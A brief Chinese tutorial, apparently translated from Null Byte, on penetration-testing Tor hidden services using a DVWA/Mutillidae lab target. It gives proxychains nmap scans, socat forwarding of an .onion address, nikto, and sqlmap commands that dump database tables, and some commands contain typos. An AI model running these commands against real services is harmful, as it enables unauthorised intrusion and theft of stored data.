https://null-byte.wonderhowto.com/how-to/hack-tor-hidden-services-0166673/
一些人认为Tor服务是不可能被黑的,因为它是在一个安全的环境中。但,事实是那些服务和运行的正常服务一样,也能使用渗透工具进行攻击。仅仅需要所有的流量通过Tor网络到隐藏服务。
怎么做呢?
具体有以下工具被使用:socat(转发当地机器到隐藏服务上),nikto,sqlmap。以上工具Kali都是默认安装的。
第一步:开启隐藏服务
使用DVWA或者mutillidae做隐藏服务。
第二步:侦查隐藏服务,
确认服务开启的端口,设置转发从隐藏服务到我们的机器。可以使用prozychaons4 nmap -sT-PN -sV --open -n l3fmwusq3prwkxrv.onion
来确认开放的端口。
注意proxychains4的设置要走TOR网络。
命令格式:
socat TCP4-LISTEN:,reuseaddr,fork SOCKS4A:127.0.0.1::,socksport=
例:
socat TCP4-LISTEN:8000,reuseaddr,fork SOCKS4A:127.0.0.1:l3fmwusq3prwkxrv.onion:80,socksport=9050
这样,开启转发隐藏服务到本地的8000端口。
打开另一个终端,运行
nikto -h http://127.0.0.1:8000
第三步:爆破隐藏服务的数据库。
sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" --dbs
sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" -D prototypes --tables
sqlmap -u "http://127.0.0.1:8000/login.jsp" --data "uname=test&pass=test" -T members --dump
实际上隐藏服务和正常网络一样,一旦找到具体地址,有漏洞都可以被正常渗透。不过,事实上任何服务的协议是TCP (UDP和ICMP不能通过TOR).
可以prozychaons4 使用渗透工具,注意proxychains4的设置要走TOR网络。
领取专属 10元无门槛券
私享最新 技术干货